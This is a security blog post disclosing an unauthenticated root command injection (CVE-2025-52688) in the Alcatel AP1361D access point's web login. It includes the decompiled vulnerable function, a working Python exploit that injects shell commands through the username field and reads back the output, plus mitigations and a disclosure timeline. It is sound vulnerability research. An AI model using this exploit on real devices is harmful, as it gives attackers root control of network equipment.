Jro's Blog

Appearance

CVE-2025-52688: Alcatel AP1361D Command Injection in Web Login

CVSS Score: 9.6 Critical (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Product overview

The Alcatel AP1361D is an enterprise WiFi access point.

Analysis and exploitation of this vulnerability was performed on firmware version 4.0.4, build 2046.

Vulnerability summary

The Alcatel AP1361D web API does not sanitize the username specified by the user before using it as part of a system command.

By including special characters such as ; in the username, an unauthenticated attacker can execute arbitrary commands with root privileges on the device.

Vulnerability details

The getSession function, shown below, is called as part of the handler for the JSONRPC method user.login exposed by echo.fcgi, the main binary responsible for handling the access point's HTTP configuration interface.

This function checks if the user attempting to login already has an established and valid session on the device.

c
char *__fastcall getSession(const char *username)
{
  char *v2; // x19
  char cmd_buf[70]; // [xsp+40h] [xbp+40h] BYREF

  log("getSession\n", 0);
  memset(cmd_buf, 0, sizeof(cmd_buf));
  v2 = (char *)malloc(0x55u);
  sprintf(cmd_buf, "uci -c /tmp get sessionId.%s.sessionId 2>&1", username);
  popen(cmd_buf, v2 + 15);
  if ( !strcmp(v2 + 15, "uci: Entry not found")
    || (memset(cmd_buf, 0, sizeof(cmd_buf)),
        sprintf(cmd_buf, "uci -c /tmp get sessionId.%s.sessionValidity 2>&1", username),
        popen(cmd_buf, v2 + 50),
        !strcmp(v2 + 50, "uci: Entry not found")) )
  {
    free(v2);
    return 0;
  }
  else
  {
    strcpy(v2, username);
    return v2;
  }
}

User sessions are managed by the uci binary, which is invoked via the popen function, which executes system commands. However, the username is directly interpolated into the command to be executed in two instances, resulting in command injection.

Additionally, as this method is part of the login process, unauthenticated attackers can trivially exploit this vulnerability.

PoC script

python
import requests

import urllib3
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)


base = "https://10.10.1.103"

url = f"{base}/echo.fcgi"

headers = {
    "Host": "localhost:444",
    "Cookie": "_wnd_size_mode=5; mir_login_type=regular; language=en; __guid=111872281.3214943159562040300.1723347505438.0442; monitor_count=6",
    "Sec-Ch-Ua": '"Not;A=Brand";v="99", "Chromium";v="106"',
    "Accept": "application/json, text/plain, */*",
    "Content-Type": "application/json",
    "Sec-Ch-Ua-Mobile": "?0",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36",
    "Sec-Ch-Ua-Platform": '"Windows"',
    "Origin": "https://localhost:444",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Dest": "empty",
    "Referer": "https://localhost:444/static/login.html",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "en-GB,en-US;q=0.9,en;q=0.8",
    "Connection": "close"
}

data = {
    "id": 0,
    "jsonrpc": "2.0",
    "session": "",
    "username": ";sh && sleep 1;",
    "method": "downloader.syslog",
    "params": {
        "username": "Administrator",
    }
}

def exploit(s):
        data["username"] = f";{s};"
        response = requests.post(url, headers=headers, json=data, verify=False)

import sys
command = sys.argv[1]

print("Executing", command)
command = f"{command} >& /www/a"
for i in range(len(command)):
    exploit(f"echo -n '{command[i]}' > a{i}")

exploit(f"cp a0 b0")
for i in range(len(command)-1):
    exploit(f"cat b{i} a{i+1} > b{i+1}")

print("Command written")
exploit(f"sh b{len(command)-1}")

out = requests.get(base + "/a", verify=False).text
print("Command output:")
print(out)

Demo video

Exploit conditions

Any unauthenticated attacker with network access to the Alcatel AP1361D device can exploit this vulnerability.

Mitigations

Alcatel recommends users of affect product to update to the latest version. If updating to the latest version is not possible, the workaround measure is to manage the affected product using Enterprise Mode with OmniVista Management platform and disable the web interface.

We are unable to assess the security of the mitigations implemented by Alcatel, as they have not granted us access to the updated firmware.

Timeline

  • 2024-08-11: Report submitted to SpiritCyber IoT Hackathon triage team
  • 2024-08-17: Report accepted by triage team
  • ???
  • 2025-04-21: CSA SingCert requests the firmware version of the affected device on behalf of Alcatel, we respond within the same day
  • 2025-06-25: CSA SingCert assigns CVE-2025-52688
  • 2025-07-16: Public disclosure